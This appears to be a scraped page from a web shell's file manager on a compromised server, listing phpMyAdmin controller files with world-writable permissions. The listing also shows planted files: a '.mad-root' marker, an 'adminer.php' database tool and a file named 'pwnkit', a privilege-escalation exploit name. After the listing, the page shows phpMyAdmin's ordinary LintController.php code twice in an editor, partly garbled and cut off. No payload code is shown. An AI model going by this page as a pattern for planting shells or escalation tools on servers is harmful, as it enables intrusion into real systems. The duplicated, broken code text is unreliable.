Gecko [ 8.222.176.185 ]

Name	Size	Permission
Config	[ DIR ]	drwxrwxrwx
Database	[ DIR ]	drwxrwxrwx
Export	[ DIR ]	drwxrwxrwx
Import	[ DIR ]	drwxrwxrwx
Preferences	[ DIR ]	drwxrwxrwx
Server	[ DIR ]	drwxrwxrwx
Setup	[ DIR ]	drwxrwxrwx
Sql	[ DIR ]	drwxrwxrwx
Table	[ DIR ]	drwxrwxrwx
Transformation	[ DIR ]	drwxrwxrwx
View	[ DIR ]	drwxrwxrwx
.mad-root	0 B	-rw-rw-rw-
AbstractController.php	2.53 KB	-rw-rw-rw-
BrowseForeignersController.php	2.41 KB	-rw-rw-rw-
ChangeLogController.php	3.44 KB	-rw-rw-rw-
CheckRelationsController.php	2.25 KB	-rw-rw-rw-
CollationConnectionController....	809 B	-rw-rw-rw-
ColumnController.php	1.04 KB	-rw-rw-rw-
DatabaseController.php	275 B	-rw-rw-rw-
ErrorReportController.php	6.05 KB	-rw-rw-rw-
GisDataEditorController.php	5.09 KB	-rw-rw-rw-
GitInfoController.php	1.19 KB	-rw-rw-rw-
HomeController.php	17.05 KB	-rw-rw-rw-
JavaScriptMessagesController.p...	36.16 KB	-rw-rw-rw-
LicenseController.php	940 B	-rw-rw-rw-
LintController.php	1.73 KB	-rw-rw-rw-
LogoutController.php	421 B	-rw-rw-rw-
NavigationController.php	3.2 KB	-rw-rw-rw-
NormalizationController.php	5.54 KB	-rw-rw-rw-
PhpInfoController.php	685 B	-rw-rw-rw-
RecentTablesListController.php	426 B	-rw-rw-rw-
SchemaExportController.php	667 B	-rw-rw-rw-
TableController.php	820 B	-rw-rw-rw-
ThemeSetController.php	1.23 KB	-rw-rw-rw-
ThemesController.php	772 B	-rw-rw-rw-
UserPasswordController.php	3.3 KB	-rw-rw-rw-
VersionCheckController.php	1.2 KB	-rw-rw-rw-
adminer.php	465.43 KB	-rw-rw-rw-
pwnkit	10.99 KB	-rw-rw-rw-

Code Editor : LintController.php

<?php
/**
 * Represents the interface between the linter and the query editor.
 */

declare(strict_types=1);

namespace PhpMyAdmin\Controllers;

use PhpMyAdmin\Core;
use PhpMyAdmin\Linter;

use function json_encode;

/**
 * Represents the interface between the linter and the query editor.
 */
class LintController extends AbstractController
{
    public function __invoke(): void
    {
        $params = [
            'sql_query' => $_POST['sql_query'] ?? null,
            'options' => $_POST['options'] ?? null,
        ];

/**
         * The SQL query to be analyzed.
         *
         * This does not need to be checked again XSS or MySQL injections because it is
         * never executed, just parsed.
         *
         * The client, which will receive the JSON response will decode the message and
         * and any HTML fragments that are displayed to the user will be encoded anyway.
         *
         * @var string
         */
        $sqlQuery = ! empty($params['sql_query']) ? $params['sql_query'] : '';

$this->response->setAjax(true);

// Disabling standard response.
        $this->response->disable();

Core::headerJSON();

if (! empty($params['options'])) {
            $options = $params['options'];

if (! empty($options['routineEditor'])) {
                $sqlQuery = 'CREATE PROCEDURE `a`() ' . $sqlQuery;
            } elseif (! empty($options['triggerEditor'])) {
                $sqlQuery = 'CREATE TRIGGER `a` AFTER INSERT ON `b` FOR EACH ROW ' . $sqlQuery;
            } elseif (! empty($options['eventEditor'])) {
                $sqlQuery = 'CREATE EVENT `a` ON SCHEDULE EVERY MINUTE DO ' . $sqlQuery;
            }
        }

echo json_encode(Linter::lint($sqlQuery));
    }
}

xxxxxxxxxx
                $sqlQuery = 'CREATE TRIGGER `a` AFTER INSERT ON `b` FOR EACH ROW ' . $sqlQuery;
 
<?php
/**
 * Represents the interface between the linter and the query editor.
 */
​
declare(strict_types=1);
​
namespace PhpMyAdmin\Controllers;
​
use PhpMyAdmin\Core;
use PhpMyAdmin\Linter;
​
use function json_encode;
​
/**
 * Represents the interface between the linter and the query editor.
 */
class LintController extends AbstractController
{
    public function __invoke(): void
    {
        $params = [
            'sql_query' => $_POST['sql_query'] ?? null,
            'options' => $_POST['options'] ?? null,
        ];
​
        /**
         * The SQL query to be analyzed.
         *
         * This does not need to be checked again XSS or MySQL injections because it is
         * never executed, just parsed.
         *
         * The client, which will receive the JSON response will decode the message and
         * and any HTML fragments that are displayed to the user will be encoded anyway.
         *
         * @var string
         */
        $sqlQuery = ! empty($params['sql_query']) ? $params['sql_query'] : '';
​
        $this->response->setAjax(true);
​
        // Disabling standard response.
        $this->response->disable();

${this.title}

Code Editor : LintController.php